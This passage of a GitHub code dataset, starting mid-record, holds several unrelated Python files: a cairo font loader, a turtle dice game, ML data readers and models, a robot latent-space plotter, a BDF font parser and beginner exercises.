self._cairo_so.cairo_status (cairo_t):\n raise Exception('Error creating cairo font face for ' + filename)\n\n face = cairo_ctx.get_font_face ()\n\n return face\n\ndef example():\n \"\"\"\n Example font loading.\n \"\"\"\n face = FontLoader().cairo_font_face_from_file('df9/assets/fonts/ProFontWindows.ttf', 0)\n\n surface = cairo.ImageSurface(cairo.FORMAT_ARGB32, 128, 128)\n\n ctx = cairo.Context(surface)\n\n ctx.set_font_face(face)\n ctx.set_font_size(30)\n ctx.move_to(0, 44)\n ctx.show_text('Hello,')\n\n ctx.move_to(30, 74)\n ctx.show_text('world!')\n\n del ctx\n\n surface.write_to_png('hello.png')\n","repo_name":"thorsummoner/opendf9","sub_path":"df9/fontloader.py","file_name":"fontloader.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43011150987","text":"import random\nimport time\nimport turtle\n### INIT OUR DICE ###\nscreen = turtle.Screen()\nscreen.addshape(\"dice01.gif\")\nscreen.addshape(\"dice02.gif\")\nscreen.addshape(\"dice03.gif\")\nscreen.addshape(\"dice04.gif\")\nscreen.addshape(\"dice05.gif\")\nscreen.addshape(\"dice06.gif\")\ndie01 = turtle.Turtle()\ndie02 = turtle.Turtle()\ndie03 = turtle.Turtle()\ndie04 = turtle.Turtle()\ndie05 = turtle.Turtle()\ndie06 = turtle.Turtle()\ndie01.hideturtle()\ndie02.hideturtle()\ndie03.hideturtle()\ndie04.hideturtle()\ndie05.hideturtle()\ndie06.hideturtle()\ndie01.shape(\"dice01.gif\")\ndie02.shape(\"dice02.gif\")\ndie03.shape(\"dice03.gif\")\ndie04.shape(\"dice04.gif\")\ndie05.shape(\"dice05.gif\")\ndie06.shape(\"dice06.gif\")\n\n### INSTRUCTION ###\nprint(\"Let's throw some dice!\")\n\nwhile True: #game runs until player choses presses the \"n\" key\n print(\"Throwing...\")\n #a short delay before the toss\n time.sleep(2)\n \n #random number between 1 and 6\n #does not count 7\n die_face = random.randrange(1,7)\n print(\"You rolled a \" + str(die_face))\n \n #### SHOW DIE FACES ####\n if die_face == 1:\n die01.showturtle()\n elif die_face == 2:\n die02.showturtle()\n elif die_face == 3:\n die03.showturtle()\n elif die_face == 4:\n die04.showturtle()\n elif die_face == 5:\n die05.showturtle()\n else:\n die06.showturtle()\n \n #CONTINUE?\n cont = input(\"Do you want to play again? y/n: \")\n if cont == \"n\":\n print(\"Quiting Game Now...\")\n quit()\n elif cont == \"y\":\n die01.hideturtle()\n die02.hideturtle()\n die03.hideturtle()\n die04.hideturtle()\n die05.hideturtle()\n die06.hideturtle()\n else:\n while cont != \"y\" or \"n\":\n print(\"Error: Press y/n: \")\n cont = input(\"Do you want to play again? y/n: \")\n if cont == \"n\":\n print(\"Quiting Game Now...\")\n quit()\n elif cont == \"y\":\n die01.hideturtle()\n die02.hideturtle()\n die03.hideturtle()\n die04.hideturtle()\n die05.hideturtle()\n die06.hideturtle()\n break\n else:\n continue\n\n","repo_name":"The-Grey-Wizard/Python_Dice_Game","sub_path":"dicegame.py","file_name":"dicegame.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"42643511295","text":"def aradd(arr,i,size):\n if i < size:\n print(\"element no :\",i)\n arr.append(int(input()))\n i += 1\n aradd(arr,i,size)\n \n return arr, max(arr)\n\n\narr = []\ni = 0\nsize = int(input(\"Enter array size? \"))\nlst, sm = aradd(arr,i,size)\nprint(lst)\nlst.sort()\nprint(\"Second lagest number of array is \",lst[len(lst)-2])\n#rint(large)\n#print(\"Second largest of Array \",lst,\" is \",max(lst.remove(int(max(lst)))))\n","repo_name":"Imalli5253/lbprogs","sub_path":"52.py","file_name":"52.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"20576475664","text":"import numpy as np\nfrom sklearn.utils import shuffle\nfrom osm.data_streams.oracle.oracle import Oracle\n\n\nclass AvailabilityAwareOracle(Oracle):\n\n def __init__(self, availability: float, batch=False, min_labels=0) -> None:\n \"\"\"\n An Oracle that provides true labels based on its availability\n\n :param min_labels: The minimum number of labels the oracle must provide\n :param availability: Value indicates the availability of the Oracle.\n :param batch: True if the same oracle availability is considered for the entire batch.\n If False for each instance the oracle availability is considered\n \"\"\"\n\n if availability < 0 or availability > 1:\n raise ValueError(\"Availability: Out of range. Possible values: [0,1]\")\n super().__init__()\n self.availability = availability\n self.batch = batch\n self.min_samples = min_labels\n\n def predict(self, X):\n \"\"\"\n Get labels\n :param X: {array-like, dense matrix}, shape = [n_samples], the instances for which labels need to be obtained\n :return: {array-like, dense matrix}, shape = [n_samples], labels of the provided instances. np.nan if oracle\n is not available\n \"\"\"\n self.queried = len(X)\n to_query = []\n if self.batch:\n if self.is_available():\n to_query = X\n else:\n for index in X:\n if self.is_available():\n to_query.append(index)\n\n # if we do not satisfy the minimum number of instances required\n min_required = min(len(self.data), int(self.min_samples))\n if len(to_query) < min_required:\n additionally_required = min_required - len(to_query)\n additionally_required_data = shuffle(self.data.drop(to_query), n_samples=additionally_required)\n to_query.append(additionally_required_data.index.values)\n\n return super().predict(to_query)\n\n def is_available(self):\n \"\"\"\n Function to check the availability of the oracle\n :return: True if the oracle is available\n \"\"\"\n return np.random.uniform(0, 1) <= self.availability\n\n def get_name(self):\n return \"availability_aware_oracle\"\n","repo_name":"elrasp/osm","sub_path":"osm/data_streams/oracle/availability_aware_oracle.py","file_name":"availability_aware_oracle.py","file_ext":"py","file_size_in_byte":2257,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"3987837468","text":"import csv\nimport string\nfrom nltk.stem import *\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport numpy as np\nimport pickle\nclass Data():\n\tdef __init__ (self, file, data_row, feature_row):\n\t\tself.file = file\n\t\tself.data_row = data_row\n\t\tself.feature_row = feature_row\n\t\tself.classified = {}\n\tdef extract(self):\n\t\twith open(self.file) as csv_file:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\t\t\tlable_list = []\n\t\t\tline_count = 0\n\t\t\tfor row in csv_reader:\n\t\t\t\tif line_count == 0:\n\t\t\t\t\tpass\n\t\t\t\telse:\n\t\t\t\t\tlable_list.append(row[self.feature_row])\n\t\t\t\tline_count += 1\n\t\t\tlable_list = set(lable_list)\n\t\t\tlable_list = list(lable_list)\n\t\t\tdata_lables = lable_list\n\t\t\tprint(data_lables)\n\t\twith open(self.file) as csv_file:\n\t\t\tcsv_reader = csv.reader(csv_file, delimiter=',')\n\t\t\tfor row in csv_reader:\n\t\t\t\tbinary = -1\n\t\t\t\tcounter_for_lables = 0\n\t\t\t\t#print(\"got here\")\n\t\t\t\t#print(len(data_lables))\n\t\t\t\tfor item in data_lables:\n\t\t\t\t\t#print(row[self.feature_row])\n\t\t\t\t\t#print(item)\n\t\t\t\t\tif row[self.feature_row] == item:\n\t\t\t\t\t\t#print(\"match\")\n\t\t\t\t\t\tbinary = counter_for_lables\n\t\t\t\t\tcounter_for_lables += 1\n\t\t\t\texclude = set(string.punctuation)\n\t\t\t\tremoved = ''.join(ch for ch in row[self.data_row] if ch not in exclude)\n\t\t\t\tremoved = removed.lower()\n\t\t\t\tremoved = removed.replace(\"\\n\\n\", \" \")\n\t\t\t\tremoved = removed.replace(\"\\n\", \" \")\n\t\t\t\tremoved = ' '.join(removed.split())\n\t\t\t\tstemmer = PorterStemmer()\n\t\t\t\tsplit = removed.split(\" \")\n\t\t\t\tstemmed = [stemmer.stem(item) for item in split]\n\t\t\t\tremoved = ' '.join(stemmed)\n\t\t\t\tif len(removed) >= 45 and binary != -1:\n\t\t\t\t\tself.classified[removed] = binary\n\t'''def vectorize(self):\n\t\tnew_dict = {}\n\t\tvectorizer = CountVectorizer()\n\t\twords = []\n\t\tfor item in self.classified:\n\t\t\twords.append(item)\n\t\tprint(\"making\")\n\t\tvectorizer.fit(words)\n\t\tprint(\"done making\")\n\t\tcounter = 0\n\t\tfor item in self.classified:\n\t\t\tprint(counter, end = \" \")\n\t\t\tprint(\"out of \", end = \" \")\n\t\t\tprint(len(self.classified))\n\t\t\tcounter += 1\n\t\t\tnew_dict[tuple(list(vectorizer.transform([item]).toarray().flatten()))] = self.classified[item]\n\t\tself.classified = new_dict\n\ndata = Data(\"short_lyrics.csv\", 5,4)\ndata.extract()\ndata.vectorize()\nresult = data.classified\nprint(result)\n#for item in result:\n#\tprint(np.sum(np.array(list(item))))\n\n'''","repo_name":"CarsonML/K-Nearest-Neighbors","sub_path":"preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":2274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"21108670566","text":"# imports\nimport os\nimport sys\n\ncwd = os.getcwd()\nsys.path.insert(0,cwd+'/..')\nimport time\nimport numpy as np\nimport pickle\nimport myssl\nimport matplotlib.pyplot as plt\nimport tensorflow as tf\n\nnp.random.seed(10)\n\nprint(\"Importing CIFAR\")\n\n#%%\ndef load_cfar10_batch(cifar10_dataset_folder_path, batch_id):\n with open(cifar10_dataset_folder_path + '/data_batch_' + str(batch_id), mode='rb') as file:\n # note the encoding type is 'latin1'\n batch = pickle.load(file, encoding='latin1')\n \n features = batch['data'].reshape((len(batch['data']), 3, 32, 32)).transpose(0, 2, 3, 1).reshape(((len(batch['data']))), 3*32*32)/255\n labels = batch['labels']\n \n return features, labels\n#%%\ndef normalize(x):\n \"\"\"\n argument\n - x: input image data in numpy array [32, 32, 3]\n return\n - normalized x \n \"\"\"\n min_val = np.min(x)\n max_val = np.max(x)\n x = (x-min_val) / (max_val-min_val)\n return x\n#%%\nclass cifar10loader():\n def __init__(self, path):\n \n self.data = np.zeros((0, 3*32*32))\n self.labels = np.zeros(0, dtype=int)\n self.size = 0\n \n n_batches = 5\n for batch_i in range(1, n_batches + 1):\n features, labels = load_cfar10_batch(path, batch_i)\n features = normalize(features)\n #labels = one_hot_encode(labels)\n self.data = np.concatenate((self.data, features), axis=0)\n self.labels = np.concatenate((self.labels, np.array(labels, dtype=int)), axis=0)\n self.size = self.labels.shape[0]\n \ncifar = cifar10loader(cwd + '/../' + 'data/cifar-10-batches-py')\n\ntrain_data = cifar.data\ntrain_labels = cifar.labels + 1\n\ndef weight_variable(shape):\n initial = tf.truncated_normal(shape, stddev=0.1)\n return tf.Variable(initial)\n\ndef bias_variable(shape):\n initial = tf.constant(0.1, shape=shape)\n return tf.Variable(initial)\n\ndef fc_layer(prev, input_size, output_size):\n W = weight_variable([input_size, output_size])\n b = bias_variable([output_size])\n return tf.matmul(prev, W) + b\n\nREDUCED_SIZE = 50\n\ndef autoencoder(x):\n l1 = tf.nn.tanh(fc_layer(x, 32*32*3, 100))\n l2 = tf.nn.tanh(fc_layer(l1, 100, 100))\n l3 = fc_layer(l2, 100, REDUCED_SIZE)\n l4 = tf.nn.tanh(fc_layer(l3, REDUCED_SIZE, 100))\n l5 = tf.nn.tanh(fc_layer(l4, 100, 100))\n out = tf.nn.relu(fc_layer(l5, 100, 32*32*3))\n loss = tf.reduce_mean(tf.squared_difference(x, out))\n return loss, out, l3\n\nBATCH_SIZE = 32\n\nprint(\"Training Autoencoder\")\n\n\nwith tf.Session() as sess:\n x = tf.placeholder(tf.float32, shape=[None, 32*32*3])\n\n loss, output, latent = autoencoder(x)\n\n train_step = tf.train.AdamOptimizer(1e-4).minimize(loss)\n\n # run the training loop\n sess.run(tf.global_variables_initializer())\n for i in range(20000):\n t_size = train_data.shape[0]\n batch = train_data[np.random.permutation(np.arange(t_size))[:BATCH_SIZE], :]\n feed = {x : batch}\n if i % 500 == 0:\n print(\"Step: %d. \" % (i))\n train_step.run(feed_dict=feed, session=sess)\n\n\n\n\n\n print(\"Building reduced set\")\n\n train_data_reduced = np.zeros((train_data.shape[0], REDUCED_SIZE))\n Mlatent = sess.run([latent], feed_dict = {x: train_data})\n train_data_reduced = Mlatent[0]\n\nprint(\"Computing SSL\")\n\ndef test(m, s, p):\n data, labels = train_data_reduced[:1000, :], train_labels[:1000]\n hidlabs = myssl.hide_labels(labels,p)\n agr = myssl.SSLSolver()\n predlabels,_,_ = agr.fit(data, hidlabs, m, s, tuning_param=10.)\n print(labels[:20])\n print(predlabels[:20])\n score=0\n for i in range(len(labels)):\n if labels[i]==predlabels[i]:\n score+=1\n print(\"Score is {} out of {}\".format(score, len(labels)))\n\nstart = time.time()\ntest(100,50,50)\nprint(time.time()-start)\n\n\n\n\n\n\n\n\n\n","repo_name":"clemlal/Large-Graph-Construction-for-Scalable-Semi-Supervised-Learning-GRAPHSML-Project-MVA","sub_path":"src/examples/cifar_with_autoencoder.py","file_name":"cifar_with_autoencoder.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"47"} +{"seq_id":"28441680500","text":"from typing import Dict, Optional\nimport json\nimport logging\nfrom overrides import overrides\n\nfrom allennlp.common.file_utils import cached_path\nfrom allennlp.common.util import pad_sequence_to_length\nfrom allennlp.data.dataset_readers.dataset_reader import DatasetReader\nfrom allennlp.data.fields import Field, TextField, LabelField, MetadataField, ArrayField\nfrom allennlp.data.instance import Instance\nfrom allennlp.data.token_indexers import SingleIdTokenIndexer, TokenIndexer\nfrom allennlp.data.tokenizers import Tokenizer, SpacyTokenizer, PretrainedTransformerTokenizer\n\nlogger = logging.getLogger(__name__)\n\n\n@DatasetReader.register(\"doc_nli\")\nclass DocNliReader(DatasetReader):\n\n def __init__(\n self,\n tokenizer: Optional[Tokenizer] = None,\n token_indexers: Dict[str, TokenIndexer] = None,\n max_source_length: Optional[int] = 512,\n **kwargs,\n ) -> None:\n super().__init__(manual_distributed_sharding=True, **kwargs)\n self._tokenizer = tokenizer or SpacyTokenizer()\n if isinstance(self._tokenizer, PretrainedTransformerTokenizer):\n assert not self._tokenizer._add_special_tokens\n self._token_indexers = token_indexers or {\"tokens\": SingleIdTokenIndexer()}\n self.max_source_length = max_source_length\n\n @overrides\n def _read(self, file_path: str):\n file_path = cached_path(file_path)\n\n with open(file_path, \"r\") as doc_nli_file:\n doc_nli_examples = json.load(doc_nli_file)\n count = 0\n for example in doc_nli_examples:\n label = \"entail\" if example[\"label\"] == 'entailment' else \"not_entail\"\n # using the whole paragraph as premise or just the answering sent\n premise = example['premise']\n count += 1\n # if self.joint_training and count == 1000:\n # break\n hypothesis = example[\"hypothesis\"]\n instance = self.text_to_instance(premise,\n hypothesis,\n label,\n )\n if instance:\n yield instance\n\n @overrides\n def text_to_instance(\n self, # type: ignore\n premise: str,\n hypothesis: str,\n label: str = None,\n answer_score: float = None\n ) -> Instance:\n fields: Dict[str, Field] = {}\n premise = self._tokenizer.tokenize(premise)\n hypothesis = self._tokenizer.tokenize(hypothesis)\n tokens = self._tokenizer.add_special_tokens(premise, hypothesis)\n\n if len(tokens) > self.max_source_length:\n tokens = tokens[:self.max_source_length]\n fields[\"tokens\"] = TextField(tokens, self._token_indexers)\n\n metadata = {\n \"premise_tokens\": [x.text for x in premise],\n \"hypothesis_tokens\": [x.text for x in hypothesis],\n }\n fields[\"metadata\"] = MetadataField(metadata)\n\n if label:\n fields[\"label\"] = LabelField(label)\n\n return Instance(fields)\n","repo_name":"jifan-chen/subquestions-for-fact-checking","sub_path":"dataset_reader/doc_nli_reader.py","file_name":"doc_nli_reader.py","file_ext":"py","file_size_in_byte":3130,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"47"} +{"seq_id":"26558446475","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# animator.py\n# Author: Ravi Joshi\n# Date: 2019/07/30\n\n# import modules\nimport os\nimport GPy\nimport rospy\nimport numpy as np\nfrom matplotlib import cm\nimport matplotlib.pyplot as plt\n#from matplotlib.ticker import MaxNLocator\n\n#plt.rcParams.update({'font.size': 18})\n\nstyle = 'seaborn'\nif style in plt.style.available:\n plt.style.use(style)\n\nfontsize = 16 # previously it was 14\nplt.rcParams.update({'font.size': fontsize,\n 'xtick.labelsize': fontsize,\n 'ytick.labelsize': fontsize,\n 'axes.labelsize': fontsize,\n 'legend.fontsize': fontsize,\n 'axes.titlesize': fontsize + 2,\n 'text.usetex': False})\n\nSTOP_FRAME = 166\n\nMAX_WHILL_MOVE = 10\nCURSOR_SIZE = 40\n\nwhill_from_latent = []\nwhill_from_joint = []\n\nproject_loc = '/home/ravi/ros_ws/src/baxter_whill_movement'\nfiles_dir = os.path.join(project_loc, 'files')\n\n\ndef save_data():\n header = 'movement'\n\n latent_file = os.path.join(files_dir, 'whill_from_latent.csv')\n joint_file = os.path.join(files_dir, 'whill_from_joint.csv')\n\n np.savetxt(latent_file, whill_from_latent, delimiter=',', fmt='%.6f', header=header, comments='')\n np.savetxt(joint_file, whill_from_joint, delimiter=',', fmt='%.6f', header=header, comments='')\n\n\nclass ModelPlayer():\n def __init__(self, model_file, max_points, timer_freq, dim1, dim2, resolution, manual):\n # load mrd model from pickle file\n self.mrd_model = GPy.load(model_file)\n\n mrd_X = self.mrd_model.X.mean\n self.mrd_point_count = mrd_X.shape[0]\n if self.mrd_point_count > max_points:\n print('Mean contains more samples. Shape: (%d, %d)' % mrd_X.shape)\n downsample_indices = np.random.choice(self.mrd_point_count, size=max_points, replace=False)\n mrd_X = mrd_X[downsample_indices]\n\n # parameters for doing latent function inference\n self.q_dim = mrd_X.shape[1]\n self.latent_X = np.zeros((1, self.q_dim))\n\n self.dim1 = dim1\n self.dim2 = dim2\n self.resolution = resolution\n\n self.mrd_X = mrd_X[:, [self.dim1, self.dim2]]\n\n title = 'Baxter Whill Movement using MRD'\n fig, (self.ax1, self.ax2) = plt.subplots(nrows=1, ncols=2, figsize=(10, 4))\n #self.ax2.xaxis.set_major_locator(MaxNLocator(integer=True))\n self.plot_latent_space()\n self.plot_whill_movement()\n fig.canvas.set_window_title(title)\n #self.text_handle = self.ax1.text(0.8, 0.1, 'Play Mode: OFF', horizontalalignment='center', verticalalignment='center', transform=self.ax1.transAxes, bbox={'facecolor':'green', 'alpha':0.5, 'pad':6})\n\n self.counter = 0\n self.whill_move_handle = None\n self.latent_cursor_handle = None\n\n if manual:\n #fig.suptitle('Predicted Whill movements are not sent to the Whill controller', fontstyle='italic', color='red')\n # variables for mouse cursor based motion\n self.mouse_xy = np.zeros((1, 2))\n self.start_motion = False\n self.cursor_color = 'red'\n\n # connect the cursor class\n fig.canvas.mpl_connect('button_press_event',self.mouse_click)\n fig.canvas.mpl_connect('motion_notify_event', self.mouse_move)\n fig.subplots_adjust(top=0.80)\n else:\n self.whill_move = None\n #self.init_ros_whillpy()\n self.cursor_color = 'green'\n #self.text_handle.set_text('Automatic Mode: ON')\n\n # create a timer to follow the mean trajectory\n self.ros_timer = rospy.Timer(rospy.Duration(1 / timer_freq), self.timer_callback)\n\n # adjust the space at the bottom\n #fig.subplots_adjust(bottom=0.15)\n fig.tight_layout()\n\n\n def spin(self):\n plt.show()\n\n\n def mouse_click(self, event):\n if not event.inaxes:\n return\n\n self.start_motion = ~self.start_motion\n '''\n if self.start_motion:\n #self.text_handle.set_text('Play Mode: ON')\n #self.text_handle.set_bbox({'facecolor':'red', 'alpha':0.5, 'pad':10})\n else:\n #self.text_handle.set_text('Play Mode: OFF')\n #self.text_handle.set_bbox({'facecolor':'green', 'alpha':0.5, 'pad':10})\n '''\n\n self.latent_cursor_handle.axes.figure.canvas.draw_idle()\n\n\n def update_whill_plot(self, time, whill_movement):\n self.ax2.scatter(time, whill_movement, marker='o', s=CURSOR_SIZE, color='green', alpha=0.3)\n if self.whill_move_handle is None:\n # initialize the plot handle if it is null\n self.whill_move_handle, = self.ax2.plot(time, whill_movement, color='green', linewidth=2, alpha=0.5)\n else:\n # update the cursor\n new_time = np.concatenate((self.whill_move_handle.get_xdata(), np.array((time), ndmin=1)))\n new_movement = np.concatenate((self.whill_move_handle.get_ydata(), np.array((whill_movement), ndmin=1)))\n self.whill_move_handle.set_xdata(new_time)\n self.whill_move_handle.set_ydata(new_movement)\n\n self.whill_move_handle.axes.figure.canvas.draw_idle()\n\n\n def update_latent_cursor(self, cursor):\n if self.latent_cursor_handle is None:\n self.latent_cursor_handle = self.ax1.scatter(cursor[0, 0], cursor[0, 1], marker='o', s=CURSOR_SIZE, color=self.cursor_color, alpha=0.5)\n else:\n new_offset = np.concatenate((self.latent_cursor_handle.get_offsets(), cursor))\n self.latent_cursor_handle.set_offsets(new_offset)\n\n self.latent_cursor_handle.axes.figure.canvas.draw_idle()\n\n\n def mouse_move(self, event):\n if not event.inaxes:\n return\n\n # get the current mouse cursor position\n cursor = np.array((event.xdata, event.ydata), ndmin=2)\n if np.linalg.norm(cursor - self.mouse_xy) < 0.05:\n return\n\n time = self.counter\n\n # increment the counter\n self.counter += 1\n\n # store the current mouse position\n self.mouse_xy = cursor.copy()\n\n self.update_latent_cursor(cursor)\n joint_angles = self.get_joint_angles(cursor)\n\n whill_movement = self.get_whill_movement(joint_angles)\n self.update_whill_plot(time, whill_movement)\n\n\n def timer_callback(self, data):\n cursor = self.mrd_X[self.counter]\n time = self.counter\n\n # increment the counter\n self.counter += 1\n\n # stop the timer if we have finished the trajectory\n if self.counter >= self.mrd_point_count:\n self.ros_timer.shutdown()\n rospy.loginfo('Trajectory finished')\n return\n\n # get the mean value of the current X\n cursor = np.array((cursor[0], cursor[1]), ndmin=2)\n\n self.update_latent_cursor(cursor)\n joint_angles = self.get_joint_angles(cursor)\n\n # whill movement predicted from 2D latent space\n whill_movement_latent = self.mrd_model.predict(self.latent_X, Yindex=1)\n # whill movement predicted from joint angles\n whill_movement = self.get_whill_movement(joint_angles)\n self.update_whill_plot(time, whill_movement)\n\n whill_from_latent.append(np.mean(whill_movement_latent[0]))\n whill_from_joint.append(whill_movement)\n\n # stop the timer if we have finished the trajectory\n if self.counter >= STOP_FRAME:\n self.ros_timer.shutdown()\n rospy.loginfo('Stop condition arrived')\n return\n\n\n def plot_latent_space(self, plot_inducing=False, plot_variance=True):\n x_min, y_min = self.mrd_X.min(axis=0)\n x_max, y_max = self.mrd_X.max(axis=0)\n x_r, y_r = x_max - x_min, y_max - y_min\n x_min -= 0.1 * x_r\n x_max += 0.1 * x_r\n y_min -= 0.1 * y_r\n y_max += 0.1 * y_r\n\n #self.ax1.scatter(self.mrd_X[:, 0], self.mrd_X[:, 1], marker='o', s=50, color='b', alpha=0.8, label='Train')\n #self.ax1.plot(self.mrd_X[:, 0], self.mrd_X[:, 1], color='blue', linewidth=2, alpha=0.8, label='Mean')\n\n if plot_variance:\n def get_variance(x):\n Xtest_full = np.zeros((x.shape[0], self.q_dim))\n Xtest_full[:, [self.dim1, self.dim2]] = x\n _, var = self.mrd_model.predict(np.atleast_2d(Xtest_full))\n var = var[:, :1]\n return -np.log(var)\n\n x, y = np.mgrid[x_min : x_max : 1j * self.resolution, y_min : y_max : 1j * self.resolution]\n grid_data = np.vstack((x.flatten(), y.flatten())).T\n grid_variance = get_variance(grid_data).reshape((self.resolution, -1))\n self.ax1.imshow(grid_variance.T, interpolation='bilinear', origin='lower', cmap=cm.gray, extent=(x_min, x_max, y_min, y_max))\n\n if plot_inducing:\n Z = self.mrd_model.Z\n self.ax1.scatter(Z[:, self.dim1], Z[:, self.dim2], color='white', s=CURSOR_SIZE, marker='^', alpha=0.6)\n\n self.ax1.set_xlim((x_min, x_max))\n self.ax1.set_ylim((y_min, y_max))\n\n self.ax1.grid(False)\n self.ax1.set_aspect('auto')\n #self.ax1.legend(loc='upper right')\n self.ax1.set_xlabel('Dimension %i' % self.dim1)\n self.ax1.set_ylabel('Dimension %i' % self.dim2)\n #self.ax1.title.set_text('Latent Space Visualization')\n\n\n def plot_whill_movement(self):\n self.ax2.grid(True)\n self.ax2.set_ylim((-1, MAX_WHILL_MOVE))\n self.ax2.set_xlabel('Timestamp')\n self.ax2.set_ylabel('Predicted Movement')\n #self.ax2.title.set_text('Whill Movement Visualization')\n\n\n def get_joint_angles(self, cursor):\n # update the latent variable X before prediction\n self.latent_X[0, self.dim1] = cursor[0, 0]\n self.latent_X[0, self.dim2] = cursor[0, 1]\n\n joint_angles = self.mrd_model.predict(self.latent_X, Yindex=0)\n return joint_angles[0][0,:].tolist()\n\n\n def get_whill_movement(self, joint_angles):\n x_predict, _ = self.mrd_model.Y0.infer_newX(np.array(joint_angles, ndmin=2), optimize=False)\n y_out = self.mrd_model.predict(x_predict.mean, Yindex=1)\n return np.mean(y_out[0])\n\n\ndef main():\n rospy.init_node('some_random_name')\n rospy.on_shutdown(save_data)\n\n model_file = os.path.join(files_dir, 'mrd_model.pkl')\n\n max_points = 200\n timer_freq = 5.0\n dim1 = 0\n dim2 = 1\n resolution = 50\n manual = False\n\n player = ModelPlayer(model_file, max_points, timer_freq, dim1, dim2, resolution, manual)\n player.spin()\n\nif __name__ == '__main__':\n main()\n","repo_name":"ravijo/HSI2020","sub_path":"scripts/plot_latent_and_whill.py","file_name":"plot_latent_and_whill.py","file_ext":"py","file_size_in_byte":10640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"74273497423","text":"\nclass BDF:\n def __init__(self, f):\n self.file = f\n\n f.seek(0)\n\n self.characters = {}\n\n metadata = True\n character = False\n bitmap_lines_left = 0\n bounds = None\n bitmap = None\n code_point = None\n character_name = None\n for lineno, line in enumerate(self.file.readlines()):\n if lineno == 0 and not line.startswith(\"STARTFONT 2.1\"):\n raise ValueError(\"Unsupported file version\")\n if line.startswith(\"CHARS \"):\n metadata = False\n if line.startswith(\"SIZE\"):\n _, self.point_size, self.x_resolution, self.y_resolution = line.split()\n elif line.startswith(\"COMMENT\"):\n token, comment = line.split(\" \", 1)\n print(comment.strip(\"\\n\\\"\"))\n elif line.startswith(\"STARTCHAR\"):\n print(lineno, line.strip())\n _, character_name = line.split()\n character = True\n elif line.startswith(\"ENDCHAR\"):\n character = False\n elif line.startswith(\"BBX\"):\n _, x, y, dx, dy = line.split()\n x = int(x)\n y = int(y)\n dx = int(dx)\n dy = int(dy)\n bounds = (x, y, dx, dy)\n character = False\n elif line.startswith(\"BITMAP\"):\n character = False\n bitmap_lines_left = bounds[1]\n bitmap = []\n elif line.startswith(\"ENCODING\"):\n _, code_point = line.split()\n code_point = int(code_point)\n print(hex(code_point))\n elif bitmap_lines_left > 0:\n bits = int(line.strip(), 16)\n shift = 8 - bounds[0]\n bits >>= shift\n pixels = (\"{0:0\" + str(bounds[0]) +\"b}\").format(bits).replace(\"0\", \" \")\n bitmap.append(pixels)\n bitmap_lines_left -= 1\n\n if bitmap_lines_left == 0:\n self.characters[code_point] = {\"name\": character_name, \"bitmap\": bitmap}\n elif metadata:\n print(lineno, line.strip())\n","repo_name":"compromyse/raspi-ducky","sub_path":"circuitpython/tools/bitmap_font/adafruit_bitmap_font/pcf.py","file_name":"pcf.py","file_ext":"py","file_size_in_byte":2208,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"18901345331","text":"from collections import deque\n\nn=int(input())\na,b=map(int,input().split())\nm=int(input())\ngraph=[[]for _ in range(n+1)]\nvisited=[False]*(n+1)\nfor i in range(m):\n x,y=map(int,input().split())\n graph[x].append(y)\n graph[y].append(x)\n\ndef bfs(a,b):\n queue=deque([a])\n visited[a]=True\n while queue:\n v=queue.popleft()\n for i in graph[v]:\n if not visited[i]:\n visited[i]=visited[v]+1\n queue.append(i)\n return visited[b]\n\nprint(bfs(a,b)-1)","repo_name":"rawfishthelgh/codetest","sub_path":"백준 문제모음/백준2644_2.py","file_name":"백준2644_2.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36982637715","text":"\"\"\"\r\n#iterantion and yield\r\n\r\ndef ha(max):\r\n n,a,b=0,0,1\r\n while n< max:\r\n yield b\r\n a,b=b,a+b\r\n n+=1\r\nfor x in ha(5):\r\n print(x)\r\nf=ha(6)\r\nprint(next(f))\r\nprint(next(f))\r\nprint(next(f))\r\nprint(next(f))\r\nprint(next(f))\r\nprint(next(f))\r\nprint(\"_____________________\")\r\nclass MyNumbers:\r\n def __init__(self,max):\r\n self.n, self.a, self.b,self.max = 0, 0, 1 ,max\r\n def __iter__(self):\r\n return self\r\n def __next__(self):\r\n if self.nnum else 2\r\n else:\r\n break\r\n n+=1\r\n q[4]=\"The answer is \"+str(num)+\" you used 7 chances.\"\r\n con=guess(4) if n>=7 else guess(3)\r\n con=guess(5)\r\nprint(\"Bye-bye.\")\r\n\"\"\"\r\n#main\r\n\"\"\"\r\na=[3]\r\ndef ha():\r\n print(\"hahah\")\r\ndef wa():\r\n a[0]+=3\r\n print(a[0])\r\n\r\nif __name__ == '__main__':\r\n print('程序自身在运行')\r\n ha()\r\n wa()\r\nelse:\r\n print('我来自另一模块')\r\n\"\"\"\r\n#字符串的输出\r\n\"\"\"\r\ntable = {'Google': 1, 'Runoob': 2, 'Taobao': 3}\r\nprint(table)\r\nprint('Runoob: {0[Runoob]:d}; Google: {0[Google]:d}; Taobao: {0[Taobao]:d}'.format(table))\r\nprint('Runoob: {Runoob:d}; Google: {Google:d}; Taobao: {Taobao:d}'.format(**table))\r\nfor x in range(1, 11):\r\n print(repr(x).center(2), repr(x*x).ljust(3), end=' ')\r\n print(repr(x*x*x).rjust(4))\r\nprint('{0} 和 {1}'.format('Google', 'Runoob'))\r\ntable = {'G': 1, 'Runoob': 2, 'Taobao': 3}\r\nfor name, number 